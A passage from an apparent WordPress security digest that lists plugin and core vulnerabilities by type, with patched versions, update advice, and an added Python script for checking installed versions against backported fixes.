Recommended Action: Update to version 1.3.4.3, or a newer patched version

Plugin: OMGF | GDPR/DSGVO Compliant, Faster Google Fonts. Easy.

Vulnerability: Unauthenticated Path Traversal in REST API
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: VK Blocks

Vulnerability: Authenticated (Contributor+) Settings Update
Patched Version: 1.58.0.0
Recommended Action: Update to version 1.58.0.0, or a newer patched version

Plugin: BuddyPress Customer.io Analytics Integration

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: YITH WooCommerce Multi Vendor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.1
Recommended Action: Update to version 3.8.1, or a newer patched version

Plugin: Quick Contact Form

Vulnerability: Cross-Site Request Forgery to Sensitive Information Disclosure
Patched Version: 8.0.4
Recommended Action: Update to version 8.0.4, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Authenticated (Administrator+) Blind Server-Side Request Forgery via check_url
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: WP Home Page Menu

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: WooCommerce Pre-Orders

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Fantastic Content Protector Free

Vulnerability: Missing Authorization via update_setting_fantastic_content_protector
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: neuvoo-jobroll

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.7.9
Recommended Action: Update to version 3.7.9, or a newer patched version

Plugin: YITH WooCommerce Bulk Product Editing

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPBakery Page Builder for WordPress

Vulnerability: Multiple Cross-Site Scripting Issues
Patched Version: 4.7.4
Recommended Action: Update to version 4.7.4, or a newer patched version

Plugin: Multiple Shipping Address Woocommerce

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Democracy Poll

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.4
Recommended Action: Update to version 5.4, or a newer patched version

Plugin: Blog Filter – Advanced Post Filtering with Categories Or Tags, Post Portfolio Gallery, Blog Design Template, Blog Post Layout

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: PDF Invoices & Packing Slips for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.15
Recommended Action: Update to version 2.15, or a newer patched version

Plugin: Orbit Fox by ThemeIsle

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.10.3
Recommended Action: Update to version 2.10.3, or a newer patched version

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.70
Recommended Action: Update to version 3.0.70, or a newer patched version

Plugin: WP Better Emails

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Job Manager

Vulnerability: PHP Object Injection via PHAR Deserialization
Patched Version: 1.31.3
Recommended Action: Update to version 1.31.3, or a newer patched version

Plugin: WP Prayer

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Astra Pro Addon

Vulnerability: Authenticated (Contributor+) Remote Code Execution via Metabox
Patched Version: 4.3.2
Recommended Action: Update to version 4.3.2, or a newer patched version

Plugin: Sunny Search

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend

Vulnerability: SQL Injection & Reflected Cross-Site Scripting
Patched Version: 3.5.26
Recommended Action: Update to version 3.5.26, or a newer patched version

Plugin: WP Accessibility Helper (WAH)

Vulnerability: Missing Authorization via AJAX action
Patched Version: 0.6.2.5
Recommended Action: Update to version 0.6.2.5, or a newer patched version

Plugin: Translate WordPress with GTranslate

Vulnerability: Open Redirect
Patched Version: 2.8.11
Recommended Action: Update to version 2.8.11, or a newer patched version

Plugin: WordPress Social Login

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quotes Collection

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hide admin notices – Admin Notification Center

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: FluentSMTP – WP SMTP Plugin with Amazon SES, SendGrid, MailGun, Postmark, Google and Any SMTP Provider

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: IWS – Geo Form Fields

Vulnerability: Geo Form Fields <= 1.0
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Dexs PM System

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: swipe-hq-checkout-for-eshop

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: hiWeb Migration Simple

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress File Upload

Vulnerability: Authenticated (Contributor+) Path Traversal
Patched Version: 4.16.3
Recommended Action: Update to version 4.16.3, or a newer patched version

Plugin: Comment Link Remove and Other Comment Tools

Vulnerability: Arbitrary Comment Deletion via Cross-Site Request Forgery
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: WP Multi Store Locator

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kangu para WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.10
Recommended Action: Update to version 2.2.10, or a newer patched version

Plugin: Top 25 Social Icons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated Arbitrary File Upload leading to Remote Code Execution
Patched Version: 5.16.5
Recommended Action: Update to version 5.16.5, or a newer patched version

Plugin: Portable phpMyAdmin

Vulnerability: Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Checkout for PayPal

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Metronet Tag Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: PS PHPCaptcha WP

Vulnerability: Authenticated Denial of Service
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WP Contact Slider – Slide Out Contact Form for WordPress to display Contact Form 7, Gravity Forms, WP Forms, Ninja Forms, plain text/HTML & other shortcodes

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.4.8
Recommended Action: Update to version 2.4.8, or a newer patched version

Plugin: Multiple Domain

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: WP Human Resource Management

Vulnerability: Authorization Bypass
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: OSMapper

Vulnerability: Unauthenticated Arbitrary Post Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Abstracts

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: Font – official webfonts plugin of Fonts For Web. NO CODING! Just click & change font size, color and font face visually!

Vulnerability: Path Traversal
Patched Version: 7.5.1
Recommended Action: Update to version 7.5.1, or a newer patched version

Plugin: Active Directory Integration

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Authenticated SQL Injection
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Barcode Scanner and Inventory manager. POS (Point of Sale) – scan barcodes & create orders with barcode reader.

Vulnerability: Unauthenticated SQL Injection via userToken
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Privilege Escalation via Unprotected REST API Endpoint
Patched Version: 1.0.41
Recommended Action: Update to version 1.0.41, or a newer patched version

Plugin: User Meta – User Profile Builder and User management plugin

Vulnerability: Path Traversal
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: Video Conferencing with Zoom

Vulnerability: Sensitive Information Exposure
Patched Version: 4.2.2
Recommended Action: Update to version 4.2.2, or a newer patched version

Plugin: WP-PostRatings

Vulnerability: Race Condition
Patched Version: 1.90
Recommended Action: Update to version 1.90, or a newer patched version

Plugin: Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress

Vulnerability: Authenticated (Contributor+) SQL Injection via cntctfrmtdb_department
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Show All Comments

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.0.1
Recommended Action: Update to version 7.0.1, or a newer patched version

Plugin: Testimonials by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.1.9
Recommended Action: Update to version 0.1.9, or a newer patched version

Plugin: Image Photo Gallery Final Tiles Grid

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: WP Affiliate Links

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Product GTIN (EAN, UPC, ISBN) for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Strong Testimonials

Vulnerability: Authorization Bypass
Patched Version: 2.51.3
Recommended Action: Update to version 2.51.3, or a newer patched version

Plugin: CaPa Protect

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HC Custom WP-Admin URL

Vulnerability: Missing Authorization to Login URL Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YaySMTP – WP SMTP Plugin with Full Email Log & 15+ SMTP Services

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Header Enhancement

Vulnerability: Missing Authorization
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Nofollow Links

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.12
Recommended Action: Update to version 3.2.12, or a newer patched version

Plugin: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC)

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.10
Recommended Action: Update to version 2.6.10, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated Local File Inclusion
Patched Version: 1.5.25
Recommended Action: Update to version 1.5.25, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.26
Recommended Action: Update to version 3.3.26, or a newer patched version

Plugin: Comment Reply Email

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Gallery – Video Gallery and YouTube Gallery

Vulnerability: Type not given in this entry (affected: Video Gallery and YouTube Gallery <= 1.7.01)
Patched Version: 1.7.02
Recommended Action: Update to version 1.7.02, or a newer patched version

Plugin: SmartCrawl WordPress SEO checker, SEO analyzer, SEO optimizer

Vulnerability: Unauthenticated Password Protected Post Disclosure
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 13.1
Recommended Action: Update to version 13.1, or a newer patched version

Plugin: Jazz Popups

Vulnerability: Reflected Cross-Site Scripting via ‘wpjazzpopup_switchonoff’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Student Result or Employee Database

Vulnerability: Authentication Bypass
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Type not given in this entry (affected: Page Builder < 1.0.114)
Patched Version: 1.0.114
Recommended Action: Update to version 1.0.114, or a newer patched version

Plugin: Event Monster – Event Management, Tickets Booking, Upcoming Event

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Cross-Site Scripting
Patched Version: 4.9.4
Recommended Action: Update to version 4.9.4, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Multiple Cross-Site Scripting vulnerabilities
Patched Version: 2.0.28
Recommended Action: Update to version 2.0.28, or a newer patched version

Plugin: Zephyr Project Manager

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Shortcode Injection
Patched Version: 1.3.84
Recommended Action: Update to version 1.3.84, or a newer patched version

Plugin: User Submitted Posts – Enable Users to Submit Posts from the Front End

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 20230914
Recommended Action: Update to version 20230914, or a newer patched version

Plugin: wSecure Lite

Vulnerability: Remote Code Execution
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Full Path Disclosure
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Select All Categories and Taxonomies, Change Checkbox to Radio Buttons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: CP Contact Form with PayPal

Vulnerability: SQL Injection
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Missing Authorization
Patched Version: 0.9.95
Recommended Action: Update to version 0.9.95, or a newer patched version

Plugin: Popup Maker and Popup Anything – Popup for opt-ins and Lead Generation Conversions

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Stream Video Player

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Fastest Cache

Vulnerability: Missing Authorization in ‘wpfc_clear_cache_of_allsites_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: Sidebar Widgets by CodeLights

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leyka

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.30.2
Recommended Action: Update to version 3.30.2, or a newer patched version

Plugin: WP Bannerize

Vulnerability: Type not given in this entry (version referenced: 4.0.2)
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ClimateClick: Climate Action for all

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.9.22
Recommended Action: Update to version 1.0.9.22, or a newer patched version

Plugin: Tickera – WordPress Event Ticketing

Vulnerability: Cross-Site Request Forgery to Ticket Post Status Change
Patched Version: 3.5.1.1
Recommended Action: Update to version 3.5.1.1, or a newer patched version

Plugin: Revive Social – Social Media Auto Post and Scheduling Automation Plugin

Vulnerability: Authorization Bypass
Patched Version: 8.0.0
Recommended Action: Update to version 8.0.0, or a newer patched version

Plugin: Qi Addons For Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: OAuth Single Sign On – SSO (OAuth Client)

Vulnerability: Cross-Site Scripting
Patched Version: 6.23.0
Recommended Action: Update to version 6.23.0, or a newer patched version

Plugin: SEO SearchTerms Tagging 2

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: String locator

Vulnerability: Authenticated Arbitrary File Read
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Newsletters

Vulnerability: Cross-Site Scripting via contentarea Parameter
Patched Version: 4.6.19
Recommended Action: Update to version 4.6.19, or a newer patched version

Plugin: OAuth Client by DigitialPixies

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stripe Payment Plugin for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: Media Library Assistant

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.82
Recommended Action: Update to version 2.82, or a newer patched version

Plugin: uncode-core

Vulnerability: Privilege Escalation
Patched Version: 2.8.9
Recommended Action: Update to version 2.8.9, or a newer patched version

Plugin: Japanized For WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.5
Recommended Action: Update to version 2.5.5, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection due to Double Prepare approach
Patched Version: 3.7.23
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.23, 3.8.23, 3.9.21, 4.0.20, 4.1.20, 4.2.17, 4.3.13, 4.4.12, 4.5.11, 4.6.8, 4.7.7, 4.8.3

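The core entry above lists one patched release per supported branch, because WordPress backports security fixes rather than forcing a jump to the newest line. The check that matters is therefore "is my install at or above the patched release of *my* branch", not "is it above the lowest number in the list". The script below is an added example, not code from this digest or from WordPress; it assumes versions are dotted integers (as every entry on this page uses) and works from a constructed sample inventory. It also handles the plugin cases on this page: a single patched version, and "No patched version available", which it reports as a removal candidate.

```python
# Added example (not code from the digest): decide what to do with an installed
# WordPress core or plugin version given a digest entry's "Patched Version" line.
# Assumes versions are dotted integers, as every entry on this page uses.
from __future__ import annotations

import re


def parse_version(v: str) -> tuple[int, ...]:
    """'4.8.3' -> (4, 8, 3). Integer tuples compare numerically, so 4.8.10 sorts
    after 4.8.3; a plain string comparison would get that wrong."""
    parts = tuple(int(p) for p in re.findall(r"\d+", v))
    if not parts:
        raise ValueError(f"unparseable version: {v!r}")
    return parts


def assess(installed: str, patched: list[str] | None, branch_depth: int = 2) -> str:
    """Return 'remove', 'update' or 'ok'.

    patched is None for "No patched version available"; a single entry for a
    plugin; several entries (one per major.minor branch) for a WordPress core
    advisory, where the fix was backported and the right comparison is against
    the patched release of the installed branch, not the lowest listed version.
    """
    if not patched:
        return "remove"
    inst = parse_version(installed)
    fixes = sorted(parse_version(p) for p in patched)
    if len(fixes) == 1:
        # Plugin entry: one fix; anything older is exposed, anything newer is fine.
        return "ok" if inst >= fixes[0] else "update"
    for fix in fixes:
        if inst[:branch_depth] == fix[:branch_depth]:
            return "ok" if inst >= fix else "update"
    if inst[:branch_depth] > fixes[-1][:branch_depth]:
        # A branch newer than every listed one already carries the fix.
        return "ok"
    # Older than the oldest patched branch: that branch never received the fix.
    return "update"


# A few entries copied from the digest (plugin names shortened as dict keys).
DIGEST = {
    "WordPress": ["3.7.23", "3.8.23", "3.9.21", "4.0.20", "4.1.20", "4.2.17",
                  "4.3.13", "4.4.12", "4.5.11", "4.6.8", "4.7.7", "4.8.3"],
    "WP Fastest Cache": ["1.1.3"],
    "User Submitted Posts": ["20230914"],
    "CaPa Protect": None,
}
INSTALLED = {  # constructed sample site, not real data
    "WordPress": "4.7.5",
    "WP Fastest Cache": "1.1.10",
    "User Submitted Posts": "20230801",
    "CaPa Protect": "1.3",
}


def audit(installed: dict[str, str], digest: dict[str, list[str] | None]) -> dict[str, str]:
    """Map each installed component that appears in the digest to its verdict."""
    return {name: assess(ver, digest[name])
            for name, ver in installed.items() if name in digest}


if __name__ == "__main__":
    for name, verdict in audit(INSTALLED, DIGEST).items():
        print(f"{name:22} {INSTALLED[name]:>10}  -> {verdict}")
```

With the sample inventory, WordPress 4.7.5 is flagged for update because its branch fix is 4.7.7, even though 4.7.5 is far above the 3.7.23 that heads the list; WP Fastest Cache 1.1.10 passes because a later release on the same line is a "newer patched version"; and CaPa Protect comes back as a removal candidate because no fix exists.
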
Plugin: User Control

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: anti-plagiarism

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GamiPress – Youtube integration

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Simple Single Sign On

Vulnerability: Insecure OAuth Implementation to Authentication Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Activity Log

Vulnerability: Unauthenticated Data Export to Sensitive Information Disclosure
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: WP-Download

Vulnerability: SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: GB Gallery Slideshow

Vulnerability: SQL Injection
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Soundy Audio Playlist

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Visibility Logic for Elementor

Vulnerability: Cross-Site Request Forgery via toggle_option
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: Alpine PhotoTile for Pinterest

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.5.75
Recommended Action: Update to version 5.5.75, or a newer patched version

Plugin: Hostel

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.5.2
Recommended Action: Update to version 1.1.5.2, or a newer patched version

Plugin: Opening Hours

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Embed Discovery
Patched Version: 4.1.38
Recommended Action: Update to one of the following versions, or a newer patched version: 4.1.38, 4.2.35, 4.3.31, 4.4.30, 4.5.29, 4.6.26, 4.7.26, 4.8.22, 4.9.23, 5.0.19, 5.1.16, 5.2.18, 5.3.15, 5.4.13, 5.5.12, 5.6.11, 5.7.9, 5.8.7, 5.9.6, 6.0.4, 6.1.2, 6.2.1

Plugin: Search Exclude

Vulnerability: Arbitrary Settings Change
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Apocalypse Meow

Vulnerability: Type not given in this entry (affected version listed: 21.2.7)
Patched Version: 21.2.8
Recommended Action: Update to version 21.2.8, or a newer patched version

Plugin: EventON

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.47
Recommended Action: Update to version 1.0.47, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Drag and Drop Multiple File Upload – Contact Form 7

Vulnerability: Type not given in this entry (affected: Contact Form 7 <= 1.3.6.2)
Patched Version: 1.3.6.3
Recommended Action: Update to version 1.3.6.3, or a newer patched version

Plugin: Simplified Content

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Contact Form Generator : Creative form builder for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: ImageMapper

